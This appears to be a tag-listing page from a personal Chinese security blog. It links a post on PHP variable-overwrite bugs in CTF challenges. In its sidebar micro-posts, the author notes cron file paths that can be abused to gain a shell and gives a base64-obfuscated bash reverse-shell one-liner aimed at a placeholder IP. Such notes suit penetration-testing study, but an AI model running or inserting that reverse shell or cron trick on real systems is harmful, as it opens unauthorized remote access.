yuaneuro的小站
  • Activity Calendar

    Loading...

    Radar Chart

    Loading...

    Release Chart

    Loading...

    Classification Chart

    Loading...

    Tag Chart

    Loading...

  • New thing
    New thing
    可进行利用的cron有如下几个地方:/etc/crontab 这个是肯定的/etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。/var/spool/cron/root centos系统下root用户的cron文件/var/spool/cron/crontabs...
    2021-4-21 00:12:06
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
    2021-4-19 23:54:33
    该评论仅登录用户及评论双方可见
    2021-4-17 13:30:11
yuaneuro 喜欢钢琴和赛车
  • Good evening, pay attention to early break

  • Navigation
  • Home
  • 日常小记
  • 文章归档
  • 留言板
  • 友人帐(友情链接)
  • Components
  • Categories
    • Categories
    • 28python
    • 7ctf
    • 7杂
    • 19网络安全
    • 5linux
    • 9网站设置
    • 4php
    • 3实验
  • Links
    • Links
    • govzzp的小窝
    • 猫熊设计
    • 风渐远
    • Only Mystery Blog
    • Genius Mingo's Blog
    • 凌维三度
    • LonYJ's blog
  • Travellings
Admin
Post
Comment

Articles under the label of php

  1. Home
  2. php

php中的变量覆盖漏洞

变量覆盖在ctf中其实不少见了,最近做了几道变量覆盖的题,所以来这里总结一下。$$导致变量覆盖

  • yuaneuro
  • January 28, 2021
  • No comments
    • Popular articles
    • Latest comments
    • Random articles
    Popular articles
    • 如何用kali搭建钓鱼wifi(图文超详细)

      浏览次数: 5271
    • 网站设置复制提示,禁f12,禁止调试

      浏览次数: 1849
    • 用python提取sitemap网址并主动提交

      浏览次数: 1553
    • typecho出现评论失败及Database Query Error的几种解决方法

      浏览次数: 1458
    • 测评宝塔编译安装LNMP与LNMP一键安装包速度比较

      浏览次数: 1319
    Latest comments
    • A
      学习一下大佬操作
    • J
      xuexi yixia
    • J
      学习一下
    • SurpriseLon
      改友链啦~请把原博客名称SurpriseLon's blog改...
    • zy
      多谢楼主
    Random articles
    • django学习笔记(8)-cookie和session和token

      浏览次数: 325
    • 网络-静态路由与默认路由的配置

      浏览次数: 427
    • 网络-OSPF配置

      浏览次数: 370
    • 如何用kali搭建钓鱼wifi(图文超详细)

      浏览次数: 5271
    • 使用csdn的markdown编辑器后将图片转移到typecho

      浏览次数: 928
    Blog Info
    • 66Posts Num
    • 181Comments Num
    • 1 Y 52 DOperating Days
    • 2 Weeks AgoLast activity
    广告
    Tag cloud
    python django sql注入学习 ctf 学习笔记 渗透测试 selenium sql注入 php学习笔记 主题修改 多任务 笔记 正则 js markdown 反序列化 漏洞 协程 端口转发 typecho 爬虫 路由器 flask 多线程 多进程 iptables des 安全 php 内网渗透
    免责声明| Powered by Typecho | Theme by handsome © 2021 Copyright | 陇ICP备20000705号-2 | 甘公网安备 62060202000207号
    • 首页
    • 复制
    • 搜索
    • 前进
    • 后退
    • 重载网页
    • 和我当邻居
    • 给我留言吧